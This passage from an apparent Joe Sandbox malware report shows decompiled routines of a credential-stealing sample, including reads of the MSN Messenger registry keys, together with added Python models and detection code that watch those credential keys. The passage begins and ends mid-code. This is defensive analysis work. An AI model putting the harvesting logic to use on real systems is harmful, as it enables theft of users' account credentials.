							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));   // the next argument: the column name (no bounds check visible)
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {                       // 0x7e == '~'
								_push(0);
							} else {
								_push(1);                              // a leading '~' sets the flag ...
								_t44 = _t44 + 1;                       // ... and is skipped
							}
							_push(_t44);
							E0040A119(_t34, _t54);                     // item list; column name and flag were pushed above
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E2C();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;              // +0x28 is the element count passed to qsort below
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();   // virtual call, slot 0x5c
				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {   // 0xffffffff: "/nosort" not found among the arguments
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41748c == 0) {                              // one-time initialisation of two globals
						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41748c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);  // comparator obtained from E0040A0F3 through virtual slot 0x60
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);   // argument order as emitted by the decompiler
				}
				return SetCursor( *0x416b98);                          // restore the saved cursor handle
			}

Instruction addresses for the C-code lines above (one per line, as emitted by the decompiler): 0x0040a5af 0x0040a5b1 0x0040a5b9 0x0040a5be 0x0040a5c0 0x0040a5c2 0x0040a5c7 0x0040a5c8 0x0040a5cd 0x0040a5d6 0x0040a5de 0x0040a5e6 0x0040a5e8 0x0040a5eb 0x0040a5f1 0x0040a5f8 0x0040a5f3 0x0040a5f3 0x0040a5f5 0x0040a5f5 0x0040a5f9 0x0040a5fa 0x0040a5fa 0x0040a5ff 0x0040a605 0x0040a606 0x0040a5c0 0x0040a60b 0x0040a616 0x0040a621 0x0040a637 0x0040a63f 0x0040a645 0x0040a64d 0x0040a652 0x0040a652 0x0040a668 0x0040a676 0x0040a67b 0x0040a68d

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Cursor_mbsicmpqsort
• String ID: /nosort$/sort
• API String ID: 882979914-1578091866
• Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
• Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
• Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
• Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
Uniqueness

Uniqueness Score: -1.00%
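The decompiled E0040A5AC above is the argument handling of the password-recovery tool the report's Yara rules identify: "/sort" is matched case-insensitively (_mbsicmp), the argument after it names a column, a leading '~' on that name sets a flag and is stripped, and the item list is sorted with qsort unless "/nosort" is present. The Python below is an added reference model written for this page, not code from the sample or its author. Reading the '~' flag as "descending" follows NirSoft's documented convention for these switches; the page only shows the flag being set. How several "/sort" switches combine is not visible either (the page shows one qsort with comparator E0040A0F3), so giving the first-named column priority is an assumption. Unlike the decompile, which reads argument i+1 with no visible bounds check, a trailing "/sort" is ignored here.

```python
from typing import List, NamedTuple, Tuple


class SortSpec(NamedTuple):
    column: str
    descending: bool   # set when the column argument began with '~' (0x7e in the decompile)


def parse_sort_switches(argv: List[str]) -> Tuple[List[SortSpec], bool]:
    """Model of the argument loop in E0040A5AC. Each '/sort' (case-insensitive, as
    _mbsicmp compares) takes the following argument as the column to sort by; a
    leading '~' is stripped and recorded. '/nosort' anywhere disables sorting.
    A trailing '/sort' with no column after it is ignored (the decompile shows no
    such check)."""
    specs: List[SortSpec] = []
    for i, arg in enumerate(argv):
        if arg.lower() == "/sort" and i + 1 < len(argv):
            col = argv[i + 1]
            if col.startswith("~"):
                specs.append(SortSpec(col[1:], True))
            else:
                specs.append(SortSpec(col, False))
    nosort = any(a.lower() == "/nosort" for a in argv)
    return specs, nosort


def sort_rows(rows: List[dict], specs: List[SortSpec], nosort: bool) -> List[dict]:
    """Sort a list of records by the parsed switches. Priority of the first-named
    column over later ones is an assumption, not something the page shows."""
    out = list(rows)
    if nosort:
        return out
    for spec in reversed(specs):          # stable sorts, least significant key first
        out.sort(key=lambda r: r[spec.column], reverse=spec.descending)
    return out


if __name__ == "__main__":
    # Constructed sample command line; the column names are placeholders.
    sample_argv = ["tool.exe", "/sort", "~Password", "/sort", "URL"]
    print(parse_sort_switches(sample_argv))
```

The model makes the two things an analyst wants from this function explicit: the exact spelling of the switches it accepts, which is what a command line seen in process-creation telemetry can be matched against, and the fact that "/sort" as the last argument is read past the end of the list in the original.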

Control-flow Graph (basic blocks and edges recovered from the graph source; the Executed / Not Executed colouring of the original image is not preserved in text)
  391: 40ee59-40ee70 (call 40edac) -> 394, 395
  394: 40ee72-40ee7b (call 406278) -> 404, 405
  395: 40ee9b-40eeb9 (memset) -> 396, 397
  396: 40eec5-40eed3 -> 400
  397: 40eebb-40eebe -> 396, 399
  399: 40eec0-40eec3 -> 396, 402
  400: 40eee3-40eeed (call 40eb3f) -> 409, 410
  402: 40eed5-40eede -> 400
  404: 40ee8c-40ee8f -> 408
  405: 40ee7d-40ee80 -> 395, 407
  407: 40ee82-40ee85 -> 395, 411
  408: 40ee96 -> 412
  409: 40ef1d-40ef30 (strcpy) -> 412
  410: 40eeef-40ef17 (call 40eddb; call 40eb80; RegCloseKey) -> 409
  411: 40ee87-40ee8a -> 395, 404
  412: 40ef33-40ef35
C-Code - Quality: 25%
                                                                                                                                                    			E0040EE59(char* __edi, void* __esi) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				char _v40;
                                                                                                                                                    				void _v299;
                                                                                                                                                    				char _v300;
                                                                                                                                                    				void* _t32;
                                                                                                                                                    				char* _t37;
                                                                                                                                                    				void* _t38;
                                                                                                                                                    
                                                                                                                                                    				_t38 = __esi;
                                                                                                                                                    				_t37 = __edi;
                                                                                                                                                    				E0040EDAC();
                                                                                                                                                    				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
                                                                                                                                                    					_v300 = 0;
                                                                                                                                                    					memset( &_v299, 0, 0x103);
                                                                                                                                                    					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
                                                                                                                                                    						_push( &_v8);
                                                                                                                                                    						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                                                                                                    						_push(0x80000002);
                                                                                                                                                    					} else {
                                                                                                                                                    						_push( &_v8);
                                                                                                                                                    						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                                                                                                    						_push(0x80000001);
                                                                                                                                                    					}
                                                                                                                                                    					if(E0040EB3F() == 0) {
                                                                                                                                                    						E0040EDDB(_t38);
                                                                                                                                                    						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
                                                                                                                                                    						RegCloseKey(_v8);
                                                                                                                                                    					}
                                                                                                                                                    					strcpy(_t37,  &_v300);
                                                                                                                                                    					return 0 |  *_t37 != 0x00000000;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
                                                                                                                                                    					return _t32;
                                                                                                                                                    				}
                                                                                                                                                    			}










Instruction addresses for the listing above, one per source line: 0x0040ee59, 0x0040ee59, 0x0040ee63, 0x0040ee70, 0x0040eea8, 0x0040eeae, 0x0040eeb9, 0x0040eec8, 0x0040eec9, 0x0040eece, 0x0040eed5, 0x0040eed8, 0x0040eed9, 0x0040eede, 0x0040eede, 0x0040eeed, 0x0040eef4, 0x0040ef0c, 0x0040ef17, 0x0040ef17, 0x0040ef25, 0x00000000, 0x0040ee8c, 0x0040ee90, 0x00000000, 0x0040ee90

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA
                                                                                                                                                      • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                                                                                    • memset.MSVCRT ref: 0040EEAE
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                                                                                    • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                                                                                      • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                    • API String ID: 181880968-2036018995
                                                                                                                                                    • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                                                                                    • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                                                                                                                    • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                                                                                    • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
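What E0040EE59 does, read from the listing above: it resolves SHGetSpecialFolderPathA from shell32.dll (subcall 0040EDAC: LoadLibraryA then GetProcAddress, with the pointer cached at 0x41751c) and normally calls straight through to that export. It falls back to the registry when the export is missing, or when GetVersionExA (subcall 00406278; offset 0x10 of the OSVERSIONINFOA is dwPlatformId, and 1 is VER_PLATFORM_WIN32_WINDOWS, i.e. Windows 9x/Me) and the requested CSIDL is 0x16, 0x17 or 0x19 (CSIDL_COMMON_STARTMENU, CSIDL_COMMON_PROGRAMS, CSIDL_COMMON_DESKTOPDIRECTORY), all-users folders the 9x shell cannot resolve. In the fallback it opens HKEY_LOCAL_MACHINE (0x80000002) for those three CSIDLs and HKEY_CURRENT_USER (0x80000001) otherwise, reads the value named by subcall 0040EDDB out of Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders into a 0x104-byte buffer, strcpy()s it to the caller's buffer and returns whether the result is non-empty. On its own a read of Shell Folders is not an indicator; it is the path resolver the rest of the sample uses. The Python below is an added example, not code from the report or from the sample: it re-implements that branch logic against a constructed in-memory registry so the hive and key each CSIDL request touches can be checked offline. The CSIDL-to-value-name table stands in for 0040EDDB, whose body the report does not show, and is an assumption; the value names themselves are the documented Shell Folders names.

```python
from dataclasses import dataclass, field

HKEY_CURRENT_USER = 0x80000001
HKEY_LOCAL_MACHINE = 0x80000002
SHELL_FOLDERS_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
VER_PLATFORM_WIN32_WINDOWS = 1   # OSVERSIONINFOA.dwPlatformId (offset 0x10) on Windows 9x/Me
MAX_PATH = 0x104                 # size of the stack buffer the listing memset()s to zero

# The three CSIDL values the listing compares ESI against: the per-machine
# (all users) Start Menu, Programs and Desktop folders.
CSIDL_COMMON_STARTMENU = 0x16
CSIDL_COMMON_PROGRAMS = 0x17
CSIDL_COMMON_DESKTOPDIRECTORY = 0x19
COMMON_CSIDLS = {CSIDL_COMMON_STARTMENU, CSIDL_COMMON_PROGRAMS, CSIDL_COMMON_DESKTOPDIRECTORY}

# Assumed stand-in for subcall E0040EDDB (CSIDL -> value name under "Shell Folders"),
# whose body is not in the report. These are the documented value names; which of
# them the sample's own table contains is not known from the listing.
CSIDL_VALUE_NAMES = {
    0x02: "Programs", 0x05: "Personal", 0x07: "Startup", 0x0B: "Start Menu",
    0x10: "Desktop", 0x1A: "AppData",
    CSIDL_COMMON_STARTMENU: "Common Start Menu",
    CSIDL_COMMON_PROGRAMS: "Common Programs",
    CSIDL_COMMON_DESKTOPDIRECTORY: "Common Desktop",
}


@dataclass
class FakeRegistry:
    """Constructed stand-in for the registry: (hive, key path) -> {value name: data}."""
    keys: dict = field(default_factory=dict)
    opened: list = field(default_factory=list)  # every (hive, key) the emulation opened

    def open_and_query(self, hive, key, value_name):
        self.opened.append((hive, key))
        return self.keys.get((hive, key), {}).get(value_name)


def get_special_folder(reg, csidl, shell32_export_available=True, platform_id=2):
    """Mirror the branch structure of E0040EE59; return (path, nonzero_return).

    The registry fallback is taken when shell32!SHGetSpecialFolderPathA could not be
    resolved (*0x41751c == 0), or when GetVersionExA reports Windows 9x and the caller
    asks for one of the CSIDL_COMMON_* folders. Otherwise the original calls the
    export directly; that path is represented here by a marker string.
    """
    use_registry = (not shell32_export_available) or (
        platform_id == VER_PLATFORM_WIN32_WINDOWS and csidl in COMMON_CSIDLS
    )
    if not use_registry:
        return "<SHGetSpecialFolderPathA>", True

    # Per-machine folders come from HKLM (0x80000002); everything else from HKCU (0x80000001).
    hive = HKEY_LOCAL_MACHINE if csidl in COMMON_CSIDLS else HKEY_CURRENT_USER
    value_name = CSIDL_VALUE_NAMES.get(csidl)
    if value_name is None:
        return "", False
    data = reg.open_and_query(hive, SHELL_FOLDERS_KEY, value_name)
    if data is None:
        return "", False            # open/query failed: the zeroed buffer is copied out
    path = data[:MAX_PATH - 1]      # strcpy() out of the 0x104-byte stack buffer
    return path, path != ""         # the original returns (*out != 0)


# Constructed sample hives (not taken from the report).
SAMPLE_REGISTRY = FakeRegistry(keys={
    (HKEY_CURRENT_USER, SHELL_FOLDERS_KEY): {
        "AppData": r"C:\Users\victim\AppData\Roaming",
        "Startup": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
    },
    (HKEY_LOCAL_MACHINE, SHELL_FOLDERS_KEY): {
        "Common Start Menu": r"C:\ProgramData\Microsoft\Windows\Start Menu",
    },
})


if __name__ == "__main__":
    for csidl, kw in [(0x1A, {}), (0x1A, {"shell32_export_available": False}),
                      (0x16, {"platform_id": 1}), (0x19, {"platform_id": 1})]:
        print(f"CSIDL {csidl:#04x} {kw}: {get_special_folder(SAMPLE_REGISTRY, csidl, **kw)}")
```

The trace in SAMPLE_REGISTRY.opened is the part worth keeping: on a modern Windows the function never touches the registry for the common CSIDLs, so a sandbox trace showing RegOpenKeyEx on Shell Folders from this code means either the shell32 export lookup failed or the caller asked for a non-common folder, which is what distinguishes a stock path resolver from something probing the key for other reasons.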

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 417 40396c-4039a9 call 4046d7 420 4039ae-4039b2 417->420 421 4039b4-4039c9 RegOpenKeyExA 420->421 422 4039df-4039e4 420->422 423 4039db-4039dd 421->423 424 4039cb 421->424 425 403a03-403a07 call 40d5db 422->425 426 4039e6-4039fb RegOpenKeyExA 422->426 428 403a0c-403a10 423->428 427 4039cf-4039d9 call 40d4a6 424->427 425->428 426->423 429 4039fd-403a01 426->429 427->428 431 403a12-403a1a call 4038cf 428->431 432 403a1f-403a28 428->432 429->427 431->432 432->420 435 403a2a-403a3c call 4047f1 432->435
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                                                                                                    				char _v528;
                                                                                                                                                    				intOrPtr _v540;
                                                                                                                                                    				char _v796;
                                                                                                                                                    				char _v1052;
                                                                                                                                                    				void* _v1056;
                                                                                                                                                    				void* _v1060;
                                                                                                                                                    				int _v1064;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t21;
                                                                                                                                                    				long _t23;
                                                                                                                                                    				void** _t24;
                                                                                                                                                    				long _t26;
                                                                                                                                                    				int _t32;
                                                                                                                                                    				void* _t52;
                                                                                                                                                    
                                                                                                                                                    				_t52 = __fp0;
                                                                                                                                                    				_v540 = 0x412e80;
                                                                                                                                                    				E004046D7( &_v528);
                                                                                                                                                    				_t32 = 0;
                                                                                                                                                    				_v1052 = 0;
                                                                                                                                                    				_v796 = 0;
                                                                                                                                                    				_v1064 = 0;
                                                                                                                                                    				do {
                                                                                                                                                    					if(_v1064 != _t32) {
                                                                                                                                                    						__eflags = _v1064 - 1;
                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                    							_t21 = E0040D5DB( &_v1052, __eflags); // executed
                                                                                                                                                    						} else {
                                                                                                                                                    							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                    							if(_t23 != 0) {
                                                                                                                                                    								goto L5;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t24 =  &_v1060;
                                                                                                                                                    								goto L4;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
                                                                                                                                                    						if(_t26 != 0) {
                                                                                                                                                    							L5:
                                                                                                                                                    							_t21 = 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t24 =  &_v1056;
                                                                                                                                                    							L4:
                                                                                                                                                    							_t21 = E0040D4A6( &_v1052, _t24);
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t32 = 0;
                                                                                                                                                    					if(_t21 != 0) {
                                                                                                                                                    						E004038CF(_t52, _a4,  &_v1052);
                                                                                                                                                    					}
                                                                                                                                                    					_v1064 = _v1064 + 1;
                                                                                                                                                    				} while (_v1064 <= 2);
                                                                                                                                                    				return E004047F1( &_v528);
                                                                                                                                                    			}
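E0040396C runs a three-step loop. Iteration 0 opens HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger and iteration 1 HKEY_CURRENT_USER\Software\Microsoft\MessengerService, both with samDesired 0x20019 (KEY_READ); iteration 2 calls E0040D5DB instead, whose body is not in this section. Whenever a step succeeds (E0040D4A6 or E0040D5DB returns non-zero) the result is passed to E004038CF together with the caller's argument, which is the harvesting step behind the "Tries to steal Instant Messenger accounts or passwords" signature in the summary. The Python below is an added example, not code from the report or from the sample: a parser for the "APIs" lines the report prints under each function (api.module(args), ref: call site), plus a triage pass that decodes the hive constant and access mask of each RegOpenKeyExA and flags opens of the two messenger keys this function enumerates and of the Shell Folders key read by E0040EE59 above. The sample input reuses lines copied from those two API sections and adds three constructed lines, whose ref addresses are assumed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One "APIs" line of the report: optional "Part of subcall function XXXX:" prefix,
# api.module, an optional argument list in parentheses, then "ref: <call site>".
API_LINE = re.compile(
    r"^\s*[•*-]?\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}

# Registry access-mask bits from winreg.h/winnt.h; 0x20019 is the KEY_READ composite.
KEY_RIGHTS = [(0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"),
              (0x0004, "KEY_CREATE_SUB_KEY"), (0x0008, "KEY_ENUMERATE_SUB_KEYS"),
              (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
              (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
              (0x20000, "READ_CONTROL")]

# Key paths the two listings open (lower-cased for matching). The messenger keys hold
# MSN/Windows Messenger account data; "Shell Folders" is benign on its own and is
# tagged only so the folder lookup shows up beside the credential reads.
WATCHED_KEYS = {
    r"software\microsoft\msnmessenger": "im-credentials",
    r"software\microsoft\messengerservice": "im-credentials",
    r"software\microsoft\windows\currentversion\explorer\shell folders": "folder-recon",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int                       # call-site address from "ref:"
    subcall: Optional[int] = None  # function the call was attributed to, if a subcall


def parse_api_line(line):
    """Parse one report line into an ApiCall, or None if it is not an API line."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    subcall = int(m["subcall"], 16) if m["subcall"] else None
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16), subcall)


def parse_hex(token):
    """Report arguments are bare hex; '?' means the sandbox could not recover the value."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def decode_access(mask):
    if mask == 0x20019:
        return "KEY_READ"
    if mask == 0xF003F:
        return "KEY_ALL_ACCESS"
    return "|".join(name for bit, name in KEY_RIGHTS if mask & bit) or f"{mask:#x}"


def triage_registry_opens(lines):
    """Return the RegOpenKeyEx calls that target a watched key, with decoded arguments."""
    findings = []
    for line in lines:
        call = parse_api_line(line)
        if call is None or call.api not in ("RegOpenKeyExA", "RegOpenKeyExW"):
            continue
        # RegOpenKeyEx(hKey, lpSubKey, ulOptions, samDesired, phkResult)
        hive = parse_hex(call.args[0]) if len(call.args) > 0 else None
        key = call.args[1] if len(call.args) > 1 else ""
        category = WATCHED_KEYS.get(key.lower())
        if category is None:
            continue
        mask = parse_hex(call.args[3]) if len(call.args) > 3 else None
        findings.append({
            "ref": f"{call.ref:08X}",
            "hive": HIVES.get(hive, "?" if hive is None else f"{hive:#x}"),
            "key": key,
            "access": "?" if mask is None else decode_access(mask),
            "category": category,
        })
    return findings


# Constructed input: the first four lines are copied from the two "APIs" sections
# above; the last three (MessengerService, Shell Folders, a benign HKLM key) are
# written by hand to exercise the other branches, and their ref values are assumed.
SAMPLE_API_LINES = [
    "• Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA",
    "• memset.MSVCRT ref: 0040EEAE",
    "• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17",
    r"• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5",
    r"• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7",
    r"• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,?), ref: 0040EB50",
    r"• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00401000",
]

if __name__ == "__main__":
    for f in triage_registry_opens(SAMPLE_API_LINES):
        print(f"{f['ref']}  {f['hive']}\\{f['key']}  {f['access']}  [{f['category']}]")
```

Registry opens of this kind are not something Sysmon records (its registry events 12 to 14 cover key and value creation, deletion and renames), so on an endpoint the equivalent signal needs object-access auditing with a SACL on these keys (event 4663); in a sandbox report the API trace is the place to look. Decoding the access mask matters because a read-only open of a credential key, as here, is exactly what a password-recovery routine asks for, so filtering on KEY_SET_VALUE or KEY_ALL_ACCESS would miss it.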


















Instruction addresses for the listing above, one per source line: 0x0040396c, 0x00403982, 0x0040398d, 0x00403998, 0x0040399a, 0x0040399e, 0x004039a5, 0x004039ae, 0x004039b2, 0x004039df, 0x004039e4, 0x00403a07, 0x004039e6, 0x004039f7, 0x004039f9, 0x004039fb, 0x00000000, 0x004039fd, 0x004039fd, 0x00000000, 0x004039fd, 0x004039fb, 0x004039b4, 0x004039c5, 0x004039c9, 0x004039db, 0x004039db, 0x004039cb, 0x004039cb, 0x004039cf, 0x004039d4, 0x004039d4, 0x004039c9, 0x00403a0c, 0x00403a10, 0x00403a1a, 0x00403a1a, 0x00403a1f, 0x00403a23, 0x00403a3c

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                                                                                                      • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                                                                                      • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                                                                                                      • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                                                                                      • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                                                                                                    • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                    • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                                                                                    • API String ID: 1910562259-1741179510
                                                                                                                                                    • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                                                                                    • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                                                                                                                    • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                                                                                    • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
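The APIs list above records two RegOpenKeyExA calls with hKey 0x80000001 and samDesired 0x20019 against the MSN Messenger key paths. As an added example (the editor's code, not part of the Joe Sandbox report or of the sample), the block below decodes those arguments and flags registry accesses to the same keys in a stream of audit events. The event records, process paths and the field names "process" and "key" are constructed for illustration and are not a real log schema.

```python
# Added example (editor's, not code from the Joe Sandbox report or from the
# sample): decode the RegOpenKeyExA arguments recorded in the APIs list above
# and flag registry accesses to the MSN Messenger credential keys in a stream
# of audit events. Event records and process names below are constructed for
# illustration; field names (process, key) are the editor's, not a real
# log schema.

HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}

# Registry access-right bits (winreg.h) needed to read the 0x20019 mask.
ACCESS_BITS = {
    0x00000001: "KEY_QUERY_VALUE",
    0x00000002: "KEY_SET_VALUE",
    0x00000004: "KEY_CREATE_SUB_KEY",
    0x00000008: "KEY_ENUMERATE_SUB_KEYS",
    0x00000010: "KEY_NOTIFY",
    0x00000020: "KEY_CREATE_LINK",
    0x00020000: "READ_CONTROL",
}
KEY_READ = 0x20019  # READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY


def decode_regopen(hkey: int, subkey: str, access: int) -> dict:
    """Render one RegOpenKeyExA(hKey, lpSubKey, ..., samDesired) call."""
    names = [name for bit, name in sorted(ACCESS_BITS.items()) if access & bit]
    unknown = access & ~sum(ACCESS_BITS)  # bits not in the table, if any
    if unknown:
        names.append(hex(unknown))
    return {
        "path": f"{HIVES.get(hkey, hex(hkey))}\\{subkey}",
        "access": names,
        "read_only": access == KEY_READ,
    }


# Key paths opened by the sample (from the Strings list above), lower-cased
# for matching. The watch list is the editor's; extend it with other IM/mail
# credential stores as needed.
WATCHED_SUFFIXES = (
    r"\software\microsoft\msnmessenger",
    r"\software\microsoft\messengerservice",
)


def find_im_credential_access(events):
    """Return (process, key) pairs whose key is a watched key or lies under one.

    `events` is any iterable of dicts with string fields "process" and "key".
    Matching is on the key path only, so the same check works for audit
    sources that record a read-only open (object-access auditing, a sandbox
    API trace) as well as those that record only writes.
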